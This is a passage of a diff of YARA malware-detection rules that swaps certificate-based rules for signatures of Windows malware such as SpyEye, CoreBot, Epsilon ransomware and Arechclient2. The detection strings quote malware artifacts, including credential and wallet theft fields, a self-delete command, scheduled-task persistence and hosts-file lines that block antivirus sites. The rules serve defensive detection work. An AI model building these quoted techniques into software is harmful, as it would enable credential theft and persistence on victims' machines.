+		$v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii
+		$v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $v1* ) or 5 of ( $v2* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_25A28E418Ef2D55B87Ee715B42Afbedb : FILE
+rule DITEKSHEN_MALWARE_Win_Cybergate : FILE
 {
 	meta:
-		description = "VMProtect Software CA Certificate"
+		description = "Detects CyberGate/Spyrat/Rebhip RTA"
 		author = "ditekSHen"
-		id = "dc0b80f1-c720-5d83-a92b-144b1fd05138"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6431-L6442"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4008-L4026"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be40d3b202b400eda7e78280b674823f789e292a35f0892ab3a323d1b055e789"
+		logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		thumbprint = "14e375bd4a40ddd3310e05328dda16e84bac6d34"
-		importance = 20
+
+	strings:
+		$s1 = "UnitInjectLibrary" ascii
+		$s2 = "TLoader" fullword ascii
+		$s3 = "\\\\.\\SyserDbgMsg" fullword ascii
+		$s4 = "\\\\.\\SyserBoot" fullword ascii
+		$s5 = "\\signons" ascii
+		$s6 = "####@####" ascii
+		$s7 = "XX-XX-XX-XX" fullword ascii
+		$s8 = "EditSvr" ascii
+		$s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii
+		$s10 = "L$_RasDefaultCredentials#0" fullword ascii
+		$s11 = "password" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:a2:8e:41:8e:f2:d5:5b:87:ee:71:5b:42:af:be:db" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Vmprotect_Client : FILE
+rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE
 {
 	meta:
-		description = "VMProtect Client Certificate"
+		description = "Detects WSHRAT JS variants"
 		author = "ditekSHen"
-		id = "f9fd6478-0fe5-54b6-ba33-79c02eb9ad04"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6444-L6455"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4028-L4045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d55d9fe608d5ff357a3bcf700a3d8bd9556f83c7c792b50d2276228a77209346"
+		logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "2e20b7079e5d83e7987b2605db160d1561a0c07a"
-		hash1 = "284dc48fc2a66a1071117e5f7b2ad68fba4aae69f31cf68b6b950e6205b52dc0"
-		importance = 20
+
+	strings:
+		$charset_full = "us-ascii" nocase ascii
+		$charset_begin = "\"us-\"" nocase ascii
+		$charset_end = "Array(97,115,99,105,105)" nocase ascii
+		$wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii
+		$wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii
+		$wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii
+		$s1 = "function(){return" ascii
+		$s2 = "}catch(err){" ascii
+		$s3 = "{item: \"bin.base64\"}" nocase ascii
+		$s4 = "* 1].item =" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VMProtect Client " )
+		filesize < 400KB and ( $charset_full or ( $charset_begin and $charset_end ) ) and 2 of ( $wsc_object* ) and 3 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_44Fe73F320Aa8B7B4F5Ca910Aa22333A : FILE
+rule DITEKSHEN_MALWARE_Win_Quilclipper
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script"
 		author = "ditekSHen"
-		id = "fb7a2f49-d5b4-59af-b64b-27624ff18323"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bd23ec5a-f21a-5133-a77a-de2615933b82"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6457-L6468"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4076-L4094"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a456cd32eed6c1f037bc565e7a43f2a5a2237749afc31f6b7a8b8d7a657973c6"
+		logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "e952eb51416ab15c0a38b64a32348ed40b675043"
-		importance = 20
+		tags = ""
+
+	strings:
+		$cnc1 = "QUILCLIPPER by" ascii
+		$cnc2 = "/ UserName:" ascii
+		$cnc3 = "/ System:" ascii
+		$s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii
+		$s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii
+		$s3 = "CASE BITROTATE" ascii
+		$s4 = "CASE BITXOR" ascii
+		$s5 = "CLIP( FUNC_" ascii
+		$s6 = "CLIPPUT (" ascii
+		$s7 = "FUNC _CLIPPUTFILE(" ascii
+		$s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alpeks LLC" and pe.signatures [ i ] . serial == "44:fe:73:f3:20:aa:8b:7b:4f:5c:a9:10:aa:22:33:3a" )
+		all of ( $cnc* ) or all of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Df45B36C9D0Bd248C3F9494E7Ca822 : FILE
+rule DITEKSHEN_MALWARE_Win_Spyeye : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SpyEye"
 		author = "ditekSHen"
-		id = "95100ec5-01bf-5a5a-a703-b10d320beed1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6470-L6481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4096-L4111"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "40f4ad4183ca0bc76295c535a9286994ef0e3f8ac932372328016d543bb58ab5"
+		logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4b1efa2410d9aab12af6c0b624a3738dd06d3353"
-		importance = 20
+
+	strings:
+		$x1 = "_CLEANSWEEP_" ascii wide
+		$x2 = "config.datUT" fullword ascii
+		$x3 = "webinjects.txtUT" fullword ascii
+		$s1 = "confirm:processCommand" fullword ascii
+		$s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii
+		$s3 = "(UTC%s%2.2f) %s" fullword wide
+		$s4 = "M\\F;u`r" fullword ascii
+		$s5 = "]YH0%Yn" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Adbb8Aebf8B53C6713Abaca38Be9Bf0A : FILE
+rule DITEKSHEN_MALWARE_Win_Renamer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Renamer/Tainp variants"
 		author = "ditekSHen"
-		id = "b3edea3e-8844-58a5-a600-b0695869b2c3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9e701bbe-d698-510a-b63d-3c1575dac7b0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6483-L6497"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4114-L4135"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d5e85240df57bf3b5ec4f690943f71609aaf2fb2f751b2919b6024b4247cd571"
+		logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9f9b9f5a85d3005e4c613b6c2ba20b6d5d388645"
-		importance = 20
+
+	strings:
+		$s1 = "shell\\open\\command=" fullword wide
+		$s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide
+		$s3 = "DropTarget" ascii
+		$s4 = "C:\\Windows\\Paint" fullword wide
+		$s5 = "hold.inf" fullword wide
+		$s6 = "Dropped" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Konstant LLC" and ( pe.signatures [ i ] . serial == "ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" or pe.signatures [ i ] . serial == "00:ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" ) )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 4 of ( $s* ) and for any directory in pe.data_directories : ( directory.virtual_address != 0 and directory.size == 0 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Ffc9825644Caf5B1F521780C5C7F42C : FILE
+rule DITEKSHEN_MALWARE_Win_Epsilon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Epsilon ransomware"
 		author = "ditekSHen"
-		id = "b9ed2db5-b7d4-5d74-bb11-1e8b1dfe1648"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c5561a0d-85ac-5137-a97e-310aa03eb787"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6499-L6510"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4137-L4169"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9866608a02a043e6873c6fbd231cd733b3b5a1e5b77e3205e5cf53f5ae2bcadd"
+		logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4e7e022c7bb6bd90a75674a67f82e839d54a0a5e"
-		importance = 20
+
+	strings:
+		$s1 = ".Speak \"" wide
+		$s2 = "chkUpdateRegistry" fullword wide
+		$s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide
+		$s4 = "CreateObject(\"sapi.spvoice\")" fullword wide
+		$s5 = "READ_ME.hta" wide
+		$s6 = "WScript.Sleep(" wide
+		$s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii
+		$e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00
+                78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09
+                2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00
+                63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d
+                2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00
+                70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00
+                00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00
+                73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b
+                2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00
+                70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00
+                00 09 2e 00 6f 00 64 00 }
+		$e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07
+                43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07
+                45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07
+                47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07
+                41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00
+                65 00 78 00 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $e* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3112C69D460C781Fd649C71E61Bfec82 : FILE
+rule DITEKSHEN_MALWARE_Win_Corebot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CoreBot"
 		author = "ditekSHen"
-		id = "a8092e36-92f9-5cb0-a427-74d40a39d94f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6512-L6523"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4171-L4226"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9662a01369bc01367bcae7813b3fcb3050721471dd247885bcab8918de7c6b99"
+		logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "7ec961d2c69f7686e33f39d497a5e3039e512cf3"
-		importance = 20
+		snort_sid = "920211-920212"
+
+	strings:
+		$f1 = "core.cert_fp" fullword ascii
+		$f2 = "core.crash_handler" fullword ascii
+		$f3 = "core.delay" fullword ascii
+		$f4 = "core.guid" fullword ascii
+		$f5 = "core.inject" fullword ascii
+		$f6 = "core.installed_file" fullword ascii
+		$f7 = "core.plugins_dir" fullword ascii
+		$f8 = "core.plugins_key" fullword ascii
+		$f9 = "core.safe_mode" fullword ascii
+		$f10 = "core.server" fullword ascii
+		$f11 = "core.servers" fullword ascii
+		$f12 = "core.test_env" fullword ascii
+		$f13 = "core.vm_detect" fullword ascii
+		$f14 = "core.vm_detect_skip" fullword ascii
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide
+		$s2 = "\\Microsoft\\Windows\\AppCache" wide
+		$s3 = "crash_flag" fullword wide
+		$s4 = "container.dat" fullword wide
+		$s5 = "INJECTED" fullword ascii
+		$s6 = "tmp.delete_file" fullword ascii
+		$x1 = "CoreBot v" wide
+		$x2 = "BotName" fullword ascii
+		$x3 = "RunBotKiller" fullword ascii
+		$x4 = "botv" fullword ascii
+		$x5 = "\\CoreBot\\CoreBot\\obj\\" ascii
+		$v1_1 = "newtask" fullword wide
+		$v1_2 = "drivers\\etc\\hosts" fullword wide
+		$v1_3 = "/C schtasks /create /tn \\" wide
+		$v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide
+		$v1_5 = "AntivirusInstalled" fullword ascii
+		$v1_6 = "payload" fullword ascii
+		$v1_7 = "DownloadFile" fullword ascii
+		$v1_8 = "RemoveFile" fullword ascii
+		$v1_9 = "AutoRunName" fullword ascii
+		$v1_10 = "EditHosts" fullword ascii
+		$v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide
+		$cnc1 = "&os=" fullword wide
+		$cnc2 = "&pv=" fullword wide
+		$cnc3 = "&ip=" fullword wide
+		$cnc4 = "&cn=" fullword wide
+		$cnc5 = "&lr=" fullword wide
+		$cnc6 = "&ct=" fullword wide
+		$cnc7 = "&bv=" fullword wide
+		$cnc8 = "&op=" fullword wide
+		$cnc9 = "&td=" fullword wide
+		$cnc10 = "&uni=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or all of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $f* ) ) or 3 of ( $x* ) or 8 of ( $v1* ) or ( 4 of ( $cnc* ) and 4 of ( $v1* ) ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F64E5B34Dc0E4893495D3B9Fd9Cde4B7 : FILE
+rule DITEKSHEN_MALWARE_Win_Dllloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown DLL Loader"
 		author = "ditekSHen"
-		id = "d408b662-6328-55a8-ab64-42ea8f18c1cf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "164967b8-d0f5-543d-82ac-bb2465b85c2a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6525-L6536"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4228-L4239"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "497e63e4a19fa5b05d1098177dc73ae2255d4608d97e1001461dc4f8edced169"
+		logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "49373674eb2190c227455c9b5833825fe01f957a"
-		importance = 20
+
+	strings:
+		$s1 = "LondLibruryA" fullword ascii
+		$s2 = "LdrLoadDll" fullword ascii
+		$s3 = "snxhk.dll" fullword ascii
+		$s4 = "DisableThreadLibraryCalls" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMASoft" and pe.signatures [ i ] . serial == "f6:4e:5b:34:dc:0e:48:93:49:5d:3b:9f:d9:cd:e4:b7" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Bec31A0A40D2E834E51Ae704E1Bf9D3 : FILE
+rule DITEKSHEN_MALWARE_Win_Farfli : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Farfli backdoor"
 		author = "ditekSHen"
-		id = "9228c13e-b380-5867-ad1f-e483c8977196"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6538-L6549"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4241-L4253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1fdd6e76deea106db9fc4ef0916b2cecd6edb3849847946f15c194a9028a76e"
+		logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "7a236872302156c58d493b63a1607a09c4f1d0b8"
-		importance = 20
+
+	strings:
+		$s1 = "%ProgramFiles%\\Google\\" fullword ascii
+		$s2 = "%s\\%d.bak" fullword ascii
+		$s3 = "%s Win7" fullword ascii
+		$s4 = "%s:%d:%s" fullword ascii
+		$s5 = "C:\\2.txt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "whatsupfuckers" and pe.signatures [ i ] . serial == "6b:ec:31:a0:a4:0d:2e:83:4e:51:ae:70:4e:1b:f9:d3" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9Fac361Ee3304079 : FILE
+rule DITEKSHEN_MALWARE_Win_Warezov : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Warezov worm/downloader"
 		author = "ditekSHen"
-		id = "4143adb3-bd23-549c-b862-0db3583be161"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6551-L6565"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4255-L4269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a32fe70e2242e587007c3985420c3bea25d35aff37f62881cc386bdeff22ca93"
+		logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2168032804def9cdbc1fc1a669377d494832f4ec"
-		importance = 20
+
+	strings:
+		$s1 = "ft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s3 = "%WINDIR%\\sqhos32.wmf" wide
+		$s4 = "Accept: */*" fullword ascii
+		$s5 = "Range: bytes=" fullword ascii
+		$s6 = "module.exe" fullword ascii
+		$s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and ( pe.signatures [ i ] . serial == "9f:ac:36:1e:e3:30:40:79" or pe.signatures [ i ] . serial == "00:9f:ac:36:1e:e3:30:40:79" ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1895De749994D0Db : FILE
+rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Arechclient2 RAT"
 		author = "ditekSHen"
-		id = "2a8129ac-9838-5798-a115-ec03c1b3c205"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6567-L6578"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4271-L4303"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b5e7998bd6303a12a8681bca88b7802caa08d9272196b830ffac5573b6e3772"
+		logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "069b9cb52a325a829aba7731ead939bc4ebf3743"
-		importance = 20
+
+	strings:
+		$s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide
+		$s2 = "\",\"BotName\":\"" wide
+		$s3 = "\",\"BotOS\":\"" wide
+		$s4 = "\",\"URLData\":\"" wide
+		$s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide
+		$s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide
+		$s7 = "<ReceiveParticipantList>" ascii
+		$s8 = "<potocSkr>" ascii
+		$s9 = "fuck_sd" fullword ascii
+		$s10 = "HandleBotKiller" fullword ascii
+		$s11 = "RunBotKiller" fullword ascii
+		$s12 = "ConnectToServer" fullword ascii
+		$s13 = "KillBrowsers" fullword ascii
+		$s14 = "keybd_event" fullword ascii
+		$s15 = "FuckCodeImg" fullword ascii
+		$v1_1 = "grabber@" fullword ascii
+		$v1_2 = "<BrowserProfile>k__" ascii
+		$v1_3 = "<SystemHardwares>k__" ascii
+		$v1_4 = "<geoplugin_request>k__" ascii
+		$v1_5 = "<ScannedWallets>k__" ascii
+		$v1_6 = "<DicrFiles>k__" ascii
+		$v1_7 = "<MessageClientFiles>k__" ascii
+		$v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii
+		$v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide
+		$v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "18:95:de:74:99:94:d0:db" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 7 of ( $v1* ) or ( 6 of ( $v1* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_28B691272719B1Ee : FILE
+rule DITEKSHEN_MALWARE_Win_Killmbr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects KillMBR"
 		author = "ditekSHen"
-		id = "5a8cf540-701f-5f94-b630-ccbaa62abfdd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b109865f-e268-5633-bb8e-f390dd050d99"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
